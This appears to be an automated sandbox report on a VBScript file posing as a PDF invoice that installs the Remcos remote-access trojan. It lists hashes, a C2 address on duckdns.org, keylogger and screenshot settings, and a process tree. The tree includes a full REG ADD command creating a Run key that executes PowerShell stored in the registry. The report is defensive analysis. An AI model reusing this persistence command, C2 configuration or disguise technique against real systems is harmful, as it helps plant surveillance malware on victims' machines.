Analysis

  • max time kernel
    119s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-11-2024 01:24

General

  • Target

    A1_racun_11-2024·pdf.vbs

  • Size

    33KB

  • MD5

    f504f2da583147ba689b230b21f1e8d3

  • SHA1

    50db98c2c533c4b8d253e05341ce99245e6c9af2

  • SHA256

    9f76359976c222dd3a0f75b05b171711f88f60105f2a285dacd3cd122fb56794

  • SHA512

    8b2d7844ea1400316c79d0055039e977eed7336fe7f387c8c2931d8437cebbae3af75431d16c93eeffcdd45ffe1cdc8b3578afe8da008f386dd26eb106545b13

  • SSDEEP

    768:VxCasOdkFIouoA9wVI5XULTNTNk3hEC9cjhZrE0XYfONFZqMVVasDwrqqX:HCasfILrxaOI/J8sDw2Q

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_11-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]"
      2⤵
      • Blocklisted process makes network request
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Hybridt% -windowstyle 1 $Absi=(gp -Path 'HKCU:\Software\Mellemdistancevaaben\').Slagsangene179;%Hybridt% ($Absi)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Hybridt% -windowstyle 1 $Absi=(gp -Path 'HKCU:\Software\Mellemdistancevaaben\').Slagsangene179;%Hybridt% ($Absi)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1796

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    da5981361e395e1fbeee672e3681252b

    SHA1

    aadb206017b90c0843e321d20644ec135663ba1e

    SHA256

    cbaeb8d62de5650006858c625bc16bdef33ede2d0b16f2761b2820b43d7803ce

    SHA512

    992e992a7188c757b7c48e9b9aca610cb2d915293d5c69881930de78896999a069b9e2178977bc5dc2c943d804bfcefdb9f13c7b6cee5f5d8378285f468ce4a7

  • C:\Users\Admin\AppData\Local\Temp\Cab8873.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarEA2.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Kathlin.Sta

    Filesize

    442KB

    MD5

    a7f0821a4cc7b62ce5b9fc2a77f8c734

    SHA1

    31c987eed44c7132dd2acefab1cbfd6609ee3975

    SHA256

    b7e932637253db899317e33068f243d7d945ad71359f79b7ba741642081769f9

    SHA512

    34db5f0331f331bdaba26997fc8c842834ec792a7a8b39a10b34b4c8b14035c775dd92572277d15170e11ed2327a823caa8a197a83dd8aca6fa7fab061e87167

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSVU5WYR4T49TZMNIQBN.temp

    Filesize

    7KB

    MD5

    e0fed1c047cb318b62ad6bb09f13edb6

    SHA1

    1315cccecb10cafaff0a63341ed475352ed8f2eb

    SHA256

    f9f6f644e10dab3b08cb4d9b08987319139e8e0e02e611ebf4ab1c806a99b7e7

    SHA512

    756313b10b058965564a2733487d5b093486b5f8b3c57dd1302428cfb769e8bcb4e2aef0cbb13c1d97291ee9b777c5abfc6660d075a531f9cd52e948d1f68d9b

  • memory/1476-62-0x0000000000D80000-0x0000000001DE2000-memory.dmp

    Filesize

    16.4MB

  • memory/1476-60-0x0000000000D80000-0x0000000001DE2000-memory.dmp

    Filesize

    16.4MB

  • memory/2632-37-0x00000000067B0000-0x0000000009BB1000-memory.dmp

    Filesize

    52.0MB

  • memory/2720-23-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

  • memory/2720-29-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-30-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

  • memory/2720-31-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-33-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-27-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-26-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-25-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-24-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-21-0x000000001B590000-0x000000001B872000-memory.dmp

    Filesize

    2.9MB

  • memory/2720-22-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-20-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB